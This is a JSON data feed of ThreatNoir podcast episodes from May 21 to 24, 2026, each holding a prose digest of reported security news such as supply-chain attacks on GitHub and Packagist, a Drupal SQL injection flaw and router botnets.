[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"podcast-episodes":3},[4,14,21,29,35,43,50],{"id":5,"date":6,"edition":7,"title":8,"article_text":9,"audio_url":10,"duration_seconds":11,"article_count":12,"created_at":13},"a2205597-1f75-4aae-82c9-efae2b8608c1","2026-05-24","afternoon","ThreatNoir Weekend Brief — May 24","# Afternoon Review in IT Security — May 24, 2026\n\nThe cybersecurity landscape continues to face escalating threats from both legacy vulnerabilities and sophisticated supply chain attacks. Today's threat intelligence reveals active exploitation campaigns targeting IoT devices, coordinated malicious package distribution across multiple ecosystems, and widespread attacks on development infrastructure, underscoring the persistent risk to organizations across all technology stacks.\n\n## RondoDox Botnet Exploits Critical 2018 Vulnerability to Hijack ASUS Routers\n\nVulnCheck researchers have identified an active campaign in which the RondoDox botnet is leveraging CVE-2018-5999, a critical vulnerability from 2018, to compromise over one million ASUS routers. The vulnerability permits attackers to bypass authentication mechanisms and gain unauthorized access to affected devices. Source: [RondoDox Botnet Exploits Critical 2018 Vulnerability to Hijack ASUS Routers](https:\u002F\u002Fhackread.com\u002Frondodox-botnet-2018-vulnerability-hijack-asus-routers\u002F)\n\nThis campaign demonstrates the continued risk posed by unpatched legacy vulnerabilities in widely deployed consumer networking equipment. Organizations and end users relying on ASUS routers should prioritize firmware updates and implement network segmentation to limit the potential impact of compromised devices.\n\n## Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects\n\nSocket researchers have uncovered a coordinated supply chain attack affecting over 700 GitHub repositories through malicious postinstall hooks embedded in package.json files. Eight Composer packages hosted on Packagist were compromised with identical malicious scripts that download and execute a binary named gvfsd-network from attacker-controlled GitHub Releases, writing it to \u002Ftmp\u002F.sshd with suppressed error output and background execution. Source: [Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects](https:\u002F\u002Fsocket.dev\u002Fblog\u002Fmalicious-postinstall-hook-found-across-700-github-repos?utm_medium=feed)\n\nThe attack is particularly concerning because the malicious code was placed in package.json rather than composer.json, targeting repositories that bundle JavaScript build tooling alongside PHP code. This cross-ecosystem placement allows the attack to evade defenders who focus exclusively on Composer metadata while overlooking JavaScript lifecycle scripts. The malicious script uses curl with disabled TLS certificate verification (curl -k), downloads an unauthenticated remote binary, and executes it immediately during installation with no integrity checking. Two affected packages—devdojo\u002Fwave with 6,400 GitHub stars and devdojo\u002Fgenesis with 9,100 Packagist installs—represent the highest risk due to their use as Laravel starter kits, where the malicious package.json lands at the project root and executes during npm install. The attacker infrastructure centered on the GitHub account parikhpreyash4 suggests a broader campaign, with hundreds of additional references detected across Node.js repositories, though the full scope remains unconfirmed.\n\n## 5,561 GitHub Repositories Hit by Megalodon Supply Chain Attack in Six Hours\n\nSafeDep has disclosed the Megalodon attack, which compromised 5,561 GitHub repositories in just six hours through malicious CI workflows designed to steal cloud credentials. The attack employed two malware variants, Optimize-Build and SysDiag, targeting development infrastructure at scale. Source: [5,561 GitHub Repositories Hit by Megalodon Supply Chain Attack in Six Hours](https:\u002F\u002Fhackread.com\u002Fgithub-repositories-megalodon-supply-chain-attack\u002F)\n\nThis campaign highlights the speed and scale at which modern supply chain attacks can propagate through development platforms, with attackers leveraging CI\u002FCD pipeline abuse to extract sensitive cloud credentials from compromised repositories.\n\n## Drupal: Critical SQL Injection Flaw Now Targeted in Attacks\n\nDrupal has issued a warning that a highly critical SQL injection vulnerability announced earlier this week is now being actively exploited in the wild. The flaw, tracked as CVE-2026-9082, presents a significant risk to Drupal installations that have not yet applied available patches. Source: [Drupal: Critical SQL Injection Flaw Now Targeted in Attacks](https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fdrupal-critical-sql-injection-flaw-now-targeted-in-attacks\u002F)\n\nOrganizations operating Drupal instances should treat this vulnerability with the highest priority and apply security updates immediately to prevent unauthorized database access and potential system compromise.\n\nThe convergence of these threats—from legacy IoT vulnerabilities to sophisticated supply chain attacks targeting both package repositories and CI\u002FCD infrastructure—underscores the need for comprehensive security strategies spanning network segmentation, dependency auditing, and continuous monitoring of development pipelines.\n","https:\u002F\u002Fcdn.threatnoir.com\u002Fpodcasts\u002F2026-05-24\u002Fthreatnoir-afternoon-brief-2026-05-24.mp3",138,4,"2026-05-24T13:17:35.768572+00:00",{"id":15,"date":6,"edition":16,"title":8,"article_text":17,"audio_url":18,"duration_seconds":19,"article_count":12,"created_at":20},"5c564e08-47be-4b62-b807-1089c52c2468","morning","# Morning Review in IT Security — May 24, 2026\n\nThe cybersecurity landscape continues to face escalating threats as multiple critical incidents emerge across global organizations. From messaging platform vulnerabilities to government agency breaches, today's threat intelligence reveals a pattern of sophisticated attacks targeting both commercial and public sector entities.\n\n## WhatsApp Zero-Day Exploit Advertised for Sale\n\nA threat actor operating on an underground forum is claiming to offer a WhatsApp zero-day exploit for sale. According to the threat actor's claims, the exploit is capable of installing malware or backdoors through private messages and reportedly functions on multiple phone platforms. Source: [DarkWebInformer](https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2058257939362627626)\n\nThis development represents a significant concern for the billions of WhatsApp users worldwide, as successful exploitation of such a vulnerability could enable attackers to compromise devices without user interaction or awareness.\n\n## WisERP Customer Records Auctioned Following Alleged Breach\n\nApproximately 1.5 million U.S. customer records allegedly belonging to WisERP users have been advertised in an auction on dark web forums. The breach affects Enterprise Resource Planning customers across the United States and represents a substantial supply chain risk. Source: [DarkWebInformer](https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2058212320468193384)\n\nThe exposure of ERP system data poses particular concern due to the sensitive nature of business operations and financial information typically stored within such platforms.\n\n## Chilean Fire Department System Compromised\n\nThe VIPER Platform operated by the Chilean Fire Department has allegedly been breached, with internal records and documents exposed to threat actors. This incident affects critical infrastructure responsible for emergency response operations in Chile. Source: [DarkWebInformer](https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2058217725382561879)\n\nThe compromise of emergency services infrastructure underscores the expanding scope of cyberattacks targeting government agencies and public safety systems.\n\n## South African Revenue Service Data Breach Attributed to Nullsec\n\nThe South African Revenue Service (SARS) has allegedly fallen victim to a data breach attributed to the Nullsec threat group. This breach of a government financial institution raises concerns regarding sensitive taxpayer information and national economic security. Source: [DarkWebInformer](https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2058214877831762189)\n\nToday's threat landscape demonstrates that threat actors continue to target high-value assets across government, financial, and commercial sectors with increasing frequency and sophistication. Organizations should prioritize vulnerability patching, incident response readiness, and threat intelligence monitoring to mitigate these evolving risks.\n","https:\u002F\u002Fcdn.threatnoir.com\u002Fpodcasts\u002F2026-05-24\u002Fthreatnoir-morning-brief-2026-05-24.mp3",148,"2026-05-24T03:11:59.204472+00:00",{"id":22,"date":23,"edition":7,"title":24,"article_text":25,"audio_url":26,"duration_seconds":27,"article_count":12,"created_at":28},"fcadddd2-035e-45b1-b827-859348020a68","2026-05-23","ThreatNoir Weekend Brief — May 23","# Afternoon Review in IT Security — May 23, 2026\n\nThe cybersecurity landscape continues to face mounting pressure from multiple fronts on May 23, 2026. Critical vulnerabilities in widely deployed hardware, zero-day exploits affecting major operating systems, supply chain compromises targeting development tools, and the emerging impact of artificial intelligence on open source ecosystems all demand immediate attention from security professionals and organizations worldwide.\n\n## RondoDox Botnet Exploits Critical 2018 Vulnerability to Hijack ASUS Routers\n\nCybersecurity researchers at VulnCheck have uncovered an active exploitation campaign leveraging a critical 2018 vulnerability to compromise over a million ASUS routers globally. The RondoDox botnet is actively exploiting CVE-2018-5999 to bypass authentication mechanisms and gain unauthorized access to vulnerable devices. The campaign demonstrates how legacy vulnerabilities continue to pose significant threats when patches remain undeployed across large installed bases. Source: [Hackread](https:\u002F\u002Fhackread.com\u002Frondodox-botnet-2018-vulnerability-hijack-asus-routers\u002F)\n\nThis incident underscores the persistent risk posed by unpatched network infrastructure. Organizations and individual users operating ASUS routers should prioritize immediate firmware updates to remediate the identified vulnerability and prevent botnet infection.\n\n## Microsoft Patches Exploited UnDefend and RedSun Defender Zero-Days\n\nMicrosoft has released security patches addressing two actively exploited zero-day vulnerabilities affecting its Defender security products. The vulnerabilities, identified as CVE-2026-41091 and CVE-2026-45498, could allow attackers to escalate privileges to System level or create denial-of-service conditions on compromised systems. The BlueHammer malware has been observed exploiting these flaws in the wild. Source: [SecurityWeek](https:\u002F\u002Fwww.securityweek.com\u002Fmicrosoft-patches-exploited-undefend-and-redsun-defender-zero-days\u002F)\n\nThe exploitation of security software itself represents a critical threat vector, as it undermines the defensive infrastructure organizations depend upon. Immediate patching of all Defender installations is essential to prevent privilege escalation and system compromise.\n\n## GitHub Links Repository Breach to TanStack npm Supply-Chain Attack\n\nGitHub has confirmed that the breach of 3,800 internal repositories was facilitated through a malicious version of the Nx Console VS Code extension, which was compromised during last week's TanStack npm supply-chain attack. The attack chain demonstrates how vulnerabilities in development tools can cascade through the supply chain to compromise major technology platforms. Source: [BleepingComputer](https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fgithub-links-repo-breach-to-tanstack-npm-supply-chain-attack\u002F)\n\nThis incident highlights the critical importance of vetting third-party development extensions and maintaining rigorous monitoring of supply chain dependencies. Organizations should conduct comprehensive audits of their development tool ecosystems to identify and remediate similar compromises.\n\n## AI Has Taken Over Open Source\n\nAnalysis of open source package ecosystems reveals that artificial intelligence has fundamentally transformed the production and consumption of software dependencies. Data from Socket's comprehensive package database shows an unprecedented surge in npm package creation beginning in January 2026, with AI-generated packages now accounting for over 30 percent of new submissions based on stylistic markers. This exponential growth has been accompanied by significant changes in maintainer-contributor dynamics, with open source maintainers increasingly reporting negative experiences with low-quality automated pull requests. Source: [Socket](https:\u002F\u002Fsocket.dev\u002Fblog\u002Fai-has-taken-over-open-source?utm_medium=feed)\n\nThe shift toward AI-driven package creation and dependency selection has created a largely opaque software supply chain where human review is no longer feasible at scale. While AI-generated code often meets functional requirements and selected dependencies frequently outperform human choices, the automated nature of these decisions has created new security risks. The software supply chain has effectively become a black box, necessitating a fundamental shift toward automated analysis and behavioral monitoring of third-party code as the primary defense mechanism against supply chain attacks.\n\nAs artificial intelligence continues to reshape open source development practices, security teams must adapt their strategies to accommodate automated package generation, selection, and installation at unprecedented scale. Manual review processes are no longer viable, making automated scanning and risk assessment tools essential components of any production security posture.\n","https:\u002F\u002Fcdn.threatnoir.com\u002Fpodcasts\u002F2026-05-23\u002Fthreatnoir-afternoon-brief-2026-05-23.mp3",147,"2026-05-23T13:17:16.724387+00:00",{"id":30,"date":23,"edition":16,"title":24,"article_text":31,"audio_url":32,"duration_seconds":33,"article_count":12,"created_at":34},"f69c86ea-a6c8-4604-b50c-1f472e81569c","# Morning Review in IT Security — May 23, 2026\n\nThe security landscape on May 23, 2026, presents a critical convergence of supply chain threats and active exploitation campaigns. Researchers have identified coordinated attacks spanning multiple ecosystems, from PHP package repositories to GitHub workflows, while active exploitation of newly disclosed vulnerabilities continues to accelerate.\n\n## Malicious Postinstall Hook Detected Across 700+ GitHub Repositories\n\nSocket researchers have uncovered a coordinated supply chain campaign affecting eight Composer packages whose upstream repositories were modified to include identical malicious postinstall scripts. The attack demonstrates a sophisticated cross-ecosystem targeting strategy, as the malicious code was inserted into package.json rather than composer.json, potentially evading detection by developers and security teams focused solely on PHP dependency metadata. This placement is particularly dangerous because developers reviewing Composer packages may overlook JavaScript lifecycle hooks bundled within the same repository.\n\nThe malicious postinstall script downloads a Linux binary named gvfsd-network from an attacker-controlled GitHub Releases URL, writes it to \u002Ftmp\u002F.sshd, makes it executable, and runs it in the background. The command disables TLS certificate verification using curl -k, suppresses error output, and disguises the executable under a system-like filename. The affected packages include moritz-sauer-13\u002Fsilverstripe-cms-theme, crosiersource\u002Fcrosierlib-base, devdojo\u002Fwave, devdojo\u002Fgenesis, katanaui\u002Fkatana, elitedevsquad\u002Fsidecar-laravel, r2luna\u002Fbrain, and baskarcm\u002Ftzi-chat-ui. GitHub code searches revealed hundreds of additional references tied to the same attacker infrastructure, suggesting the campaign extends far beyond the confirmed Packagist findings.\n\nThe most significant exposure exists in starter kit projects, particularly devdojo\u002Fwave with approximately 6,400 GitHub stars and 9,100 Packagist installs. When developers clone these repositories, the malicious package.json lands at the project root, where npm install executes the postinstall script directly. Socket has recommended that teams using Packagist packages containing JavaScript build tooling inspect bundled package.json files alongside composer.json, with heightened vigilance for branch-tracking dependencies where package contents can change as upstream branches evolve. Source: [Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects](https:\u002F\u002Fsocket.dev\u002Fblog\u002Fmalicious-postinstall-hook-found-across-700-github-repos?utm_medium=feed)\n\n## Drupal Core SQL Injection Vulnerability Added to CISA KEV Catalog\n\nThe Cybersecurity and Infrastructure Security Agency has added Drupal core SQL injection vulnerability CVE-2026-9082 to its Known Exploited Vulnerabilities catalog, signaling official recognition of the threat. This addition to the KEV catalog typically indicates that the vulnerability has been observed in active exploitation attempts and warrants immediate prioritization by defenders. Source: [RT @CISACyber: 🛡️ We added Drupal core SQL injection vulnerability CVE-2026-9082 to our KEV Cata...](https:\u002F\u002Fx.com\u002FCISAgov\u002Fstatus\u002F2057893782339592352)\n\n## Drupal SQL Injection Flaw Now Under Active Attack\n\nSecurity researchers have confirmed that threat actors are actively exploiting the Drupal SQL injection vulnerability, CVE-2026-9082, which has been classified as highly critical. The rapid transition from disclosure to active exploitation underscores the urgency of patching, as attackers have already begun leveraging this flaw in real-world attacks. Organizations running Drupal installations should prioritize immediate remediation to prevent unauthorized database access and potential data exfiltration. Source: [Drupal: Critical SQL injection flaw now targeted in attacks](https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fdrupal-critical-sql-injection-flaw-now-targeted-in-attacks\u002F)\n\n## Megalodon Supply Chain Attack Compromises 5,561 GitHub Repositories in Six Hours\n\nSafeDep researchers have documented a large-scale supply chain attack designated Megalodon that targeted 5,561 GitHub repositories with malicious CI workflows and cloud credential theft mechanisms within a six-hour window. The attack demonstrates the velocity and scale at which modern supply chain threats can propagate, leveraging GitHub's CI\u002FCD infrastructure to distribute malicious payloads. The attack involved malicious artifacts tracked as Optimize-Build and SysDiag, which attempted to harvest cloud credentials and establish persistence within compromised development environments. This incident underscores the critical need for organizations to implement strict controls over CI\u002FCD pipeline configurations and monitor for unauthorized workflow modifications. Source: [5,561 GitHub Repositories Hit by Megalodon Supply Chain Attack in Six Hours](https:\u002F\u002Fhackread.com\u002Fgithub-repositories-megalodon-supply-chain-attack\u002F)\n\nThe convergence of these threats—from cross-ecosystem package poisoning to active zero-day exploitation and massive CI\u002FCD compromises—reflects an increasingly sophisticated threat landscape targeting the software supply chain. Organizations must implement layered defenses including dependency scanning, workflow auditing, and rapid patching protocols to mitigate these interconnected risks.\n","https:\u002F\u002Fcdn.threatnoir.com\u002Fpodcasts\u002F2026-05-23\u002Fthreatnoir-morning-brief-2026-05-23.mp3",166,"2026-05-23T03:11:57.576058+00:00",{"id":36,"date":37,"edition":7,"title":38,"article_text":39,"audio_url":40,"duration_seconds":41,"article_count":12,"created_at":42},"2e04d93b-929f-4673-8d60-984ea4415916","2026-05-22","ThreatNoir Afternoon Brief — May 22","# Afternoon Review in IT Security — May 22, 2026\n\nThe cybersecurity landscape continues to evolve with increasing sophistication in attack methodologies. Today's threat landscape reveals critical vulnerabilities in enterprise infrastructure, widespread supply chain compromises, and the accelerating role of artificial intelligence in enabling faster exploitation of security weaknesses.\n\n## Hackers Bypass SonicWall VPN MFA Due to Incomplete Patching\n\nThreat actors have successfully exploited SonicWall Gen6 SSL-VPN appliances by brute-forcing VPN credentials and bypassing multi-factor authentication to deploy ransomware attack tools. The vulnerability, tracked as CVE-2024-12802, remains exploitable on systems that have not received complete security patches. Attackers leveraged this access to deploy Cobalt Strike, a widely-used post-exploitation framework, enabling lateral movement and data exfiltration within compromised networks. Source: [Hackers bypass SonicWall VPN MFA due to incomplete patching](https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-bypass-sonicwall-vpn-mfa-due-to-incomplete-patching\u002F)\n\nThe incident underscores the critical importance of comprehensive patching strategies. Organizations relying on SonicWall VPN infrastructure must prioritize immediate verification that all systems have received complete security updates, as partial patching leaves the authentication bypass vulnerability intact.\n\n## GitHub Breach: TeamPCP Steals 3,800 Repositories via VS Code Extension\n\nA threat actor group known as TeamPCP has compromised GitHub by distributing a malicious Visual Studio Code extension that harvested internal repository credentials from developer machines. The breach resulted in the theft of approximately 3,800 internal repositories, which the attackers are now offering for sale online at a price of $95,000. The malware, identified as Mini Shai-Hulud, demonstrates the evolving sophistication of supply chain attacks targeting the developer ecosystem. Source: [GitHub Breach: TeamPCP Steals 3,800 Repositories via VS Code Extension](https:\u002F\u002Fhackread.com\u002Fgithub-breach-teampcp-repositories-vs-code-extension\u002F)\n\nThis incident highlights the vulnerability of integrated development environments and the trust developers place in third-party extensions. Organizations should implement controls to monitor and restrict VS Code extension installations, particularly in environments with access to sensitive code repositories.\n\n## Verizon DBIR: AI Helped Hackers Exploit Vulnerabilities in 31% of Recent Breaches\n\nThe Verizon Data Breach Investigations Report for 2026 reveals a significant shift in attack vectors, with software vulnerabilities now surpassing stolen passwords as the primary exploitation method. Artificial intelligence has accelerated the speed at which attackers can identify and exploit security flaws, with some vulnerabilities being weaponized within hours of discovery. The report indicates that AI assistance played a role in 31 percent of recent breaches examined. Source: [Verizon DBIR: AI Helped Hackers Exploit Vulnerabilities in 31% of Recent Breaches](https:\u002F\u002Fhackread.com\u002Fverizon-dbir-ai-hackers-exploit-vulnerabilities-breaches\u002F)\n\nThis trend signals a fundamental change in the threat landscape where vulnerability management has become more critical than ever. Organizations must accelerate patch deployment cycles and implement robust vulnerability assessment programs to maintain security posture against AI-assisted attackers.\n\n## Banana RAT Malware in Fake Invoices Hits Customers at 16 Brazilian Banks\n\nA remote access trojan known as Banana RAT has been deployed against customers of 16 Brazilian financial institutions through social engineering campaigns featuring fake invoices and fraudulent security update notifications. The malware, encrypted using the FastAPI crypter tool, steals sensitive customer data and facilitates QR code fraud schemes. Infrastructure associated with the campaign includes the domain convitemundial2026.com. Source: [Banana RAT Malware in Fake Invoices Hits Customers at 16 Brazilian Banks](https:\u002F\u002Fhackread.com\u002Fbanana-rat-malware-fake-invoices-16-brazilian-banks\u002F)\n\nThe targeting of banking customers demonstrates the continued effectiveness of social engineering in credential theft and system compromise. Financial institutions should reinforce customer awareness training regarding unsolicited communications and implement technical controls to detect and block known malware families associated with this campaign.\n\nThe convergence of incomplete patching practices, supply chain vulnerabilities, AI-accelerated exploitation, and sophisticated social engineering represents a multifaceted threat environment requiring comprehensive defensive strategies across technical, procedural, and human factors.\n","https:\u002F\u002Fcdn.threatnoir.com\u002Fpodcasts\u002F2026-05-22\u002Fthreatnoir-afternoon-brief-2026-05-22.mp3",137,"2026-05-22T13:17:12.063943+00:00",{"id":44,"date":37,"edition":16,"title":45,"article_text":46,"audio_url":47,"duration_seconds":48,"article_count":12,"created_at":49},"4c163f67-a2c4-4777-8af7-dc6390b8a7fc","ThreatNoir Morning Brief — May 22","# Morning Review in IT Security — May 22, 2026\n\nToday's threat landscape reveals critical vulnerabilities across multiple platforms, from cloud infrastructure delays to kernel exploits and supply-chain compromises. Organizations face mounting pressure to patch zero-days and secure API credentials as threat actors leverage both traditional exploitation and AI-assisted vulnerability discovery.\n\n## Deleted Google API Keys Remain Active up to 23 Minutes, Study Finds\n\nA significant security gap has been identified in Google Cloud Platform's API key management system. When developers delete API keys, the credentials continue to function for up to 23 minutes before being fully revoked, creating an extended window of exposure for attackers. This vulnerability affects multiple Google services including GCP, Gemini, BigQuery, and Maps, potentially allowing unauthorized access to sensitive data and resources. The delay in credential invalidation represents a critical risk for organizations that discover compromised keys and attempt immediate remediation. Source: [Deleted Google API Keys Remain Active up to 23 Minutes, Study Finds](https:\u002F\u002Fhackread.com\u002Fdeleted-google-api-keys-active-23-minutes\u002F)\n\n## macOS Kernel Memory Corruption Exploit - Schneier on Security\n\nResearchers have discovered a kernel memory corruption vulnerability affecting Apple's M5 processor architecture, with the exploitation technique developed using Anthropic's Mythos AI model. The use of advanced AI systems to identify and weaponize zero-day vulnerabilities marks a concerning escalation in threat actor capabilities. This incident demonstrates how AI-assisted security research can be repurposed for offensive operations, creating novel attack vectors against macOS systems. Source: [macOS Kernel Memory Corruption Exploit - Schneier on Security](https:\u002F\u002Fwww.schneier.com\u002Fblog\u002Farchives\u002F2026\u002F05\u002Fmacos-kernel-memory-corruption-exploit.html)\n\n## Microsoft Patches Exploited UnDefend and RedSun Defender Zero-Days\n\nMicrosoft has released patches addressing two actively exploited zero-day vulnerabilities tracked as CVE-2026-41091 and CVE-2026-45498, both affecting Windows Defender components. The vulnerabilities could allow attackers to escalate privileges to System level or launch denial-of-service attacks against protected systems. The BlueHammer malware has been observed exploiting these flaws in the wild, underscoring the urgency of immediate patching across enterprise environments. Source: [Microsoft Patches Exploited UnDefend and RedSun Defender Zero-Days](https:\u002F\u002Fwww.securityweek.com\u002Fmicrosoft-patches-exploited-undefend-and-redsun-defender-zero-days\u002F)\n\n## GitHub Links Repository Breach to TanStack npm Supply-Chain Attack\n\nGitHub has confirmed that attackers who breached 3,800 internal repositories gained initial access through a compromised version of the Nx Console VS Code extension, version 18.95.0. The malicious extension was distributed as part of last week's TanStack npm supply-chain attack, allowing threat actors to establish persistence within GitHub's infrastructure. This incident illustrates how supply-chain compromises targeting development tools can cascade into breaches of high-value targets, affecting both the platform and downstream users. Source: [GitHub links repo breach to TanStack npm supply-chain attack](https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fgithub-links-repo-breach-to-tanstack-npm-supply-chain-attack\u002F)\n\nToday's security incidents underscore the need for rapid patch deployment, careful credential management, and heightened vigilance around development tool integrity. Organizations should prioritize addressing these vulnerabilities while conducting supply-chain audits of their development dependencies.\n","https:\u002F\u002Fcdn.threatnoir.com\u002Fpodcasts\u002F2026-05-22\u002Fthreatnoir-morning-brief-2026-05-22.mp3",167,"2026-05-22T03:12:19.916042+00:00",{"id":51,"date":52,"edition":7,"title":53,"article_text":54,"audio_url":55,"duration_seconds":56,"article_count":12,"created_at":57},"2cb67717-30b2-43b4-a178-a206ef548e7d","2026-05-21","ThreatNoir Afternoon Brief — May 21","# Afternoon Review in IT Security — May 21, 2026\n\nThe threat landscape continues to evolve with supply-chain attacks, sophisticated malware campaigns, and AI-assisted exploitation techniques dominating today's security news. From compromised development tools to targeted financial sector attacks, organizations face mounting pressure to strengthen their defenses across multiple attack vectors.\n\n## GitHub Links Repository Breach to TanStack npm Supply-Chain Attack\n\nGitHub has confirmed that the breach affecting 3,800 of its internal repositories traces back to a malicious version of the Nx Console VS Code extension, which was compromised during last week's TanStack npm supply-chain attack. The attack demonstrates how vulnerabilities in widely-used development tools can cascade into major security incidents affecting major platforms. Source: [GitHub links repo breach to TanStack npm supply-chain attack](https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fgithub-links-repo-breach-to-tanstack-npm-supply-chain-attack\u002F)\n\n## GitHub Breach: TeamPCP Steals 3,800 Repositories via VS Code Extension\n\nThe threat actor group TeamPCP has claimed responsibility for stealing 3,800 internal repositories from GitHub through the malicious VS Code extension and is now attempting to sell the stolen data online for $95,000. This incident underscores the critical importance of securing development environments and monitoring third-party extensions for suspicious activity. Source: [GitHub Breach: TeamPCP Steals 3,800 Repositories via VS Code Extension](https:\u002F\u002Fhackread.com\u002Fgithub-breach-teampcp-repositories-vs-code-extension\u002F)\n\n## Verizon DBIR: AI Helped Hackers Exploit Vulnerabilities in 31% of Recent Breaches\n\nThe Verizon 2026 Data Breach Investigations Report reveals that software vulnerabilities have overtaken stolen passwords as the primary attack vector in cyberattacks, with artificial intelligence now enabling hackers to exploit identified flaws within hours of discovery. This shift represents a fundamental change in threat actor capabilities and underscores the accelerating pace of modern cyber operations. Source: [Verizon DBIR: AI Helped Hackers Exploit Vulnerabilities in 31% of Recent Breaches](https:\u002F\u002Fhackread.com\u002Fverizon-dbir-ai-hackers-exploit-vulnerabilities-breaches\u002F)\n\n## Banana RAT Malware in Fake Invoices Hits Customers at 16 Brazilian Banks\n\nA coordinated malware campaign has deployed Banana RAT through fake invoices and fraudulent security update screens, targeting customers across 16 Brazilian financial institutions. The attack employs QR code fraud tactics to steal sensitive data and demonstrates the continued effectiveness of social engineering combined with advanced remote access trojans. Source: [Banana RAT Malware in Fake Invoices Hits Customers at 16 Brazilian Banks](https:\u002F\u002Fhackread.com\u002Fbanana-rat-malware-fake-invoices-16-brazilian-banks\u002F)\n\nToday's threat intelligence reveals an increasingly sophisticated threat ecosystem where supply-chain vulnerabilities, AI-augmented attacks, and targeted financial sector operations represent the most pressing risks to organizations globally. Security teams must prioritize vulnerability management, third-party software auditing, and advanced threat detection capabilities to effectively counter these evolving threats.\n","https:\u002F\u002Fcdn.threatnoir.com\u002Fpodcasts\u002F2026-05-21\u002Fthreatnoir-afternoon-brief-2026-05-21.mp3",124,"2026-05-21T13:16:43.01282+00:00"]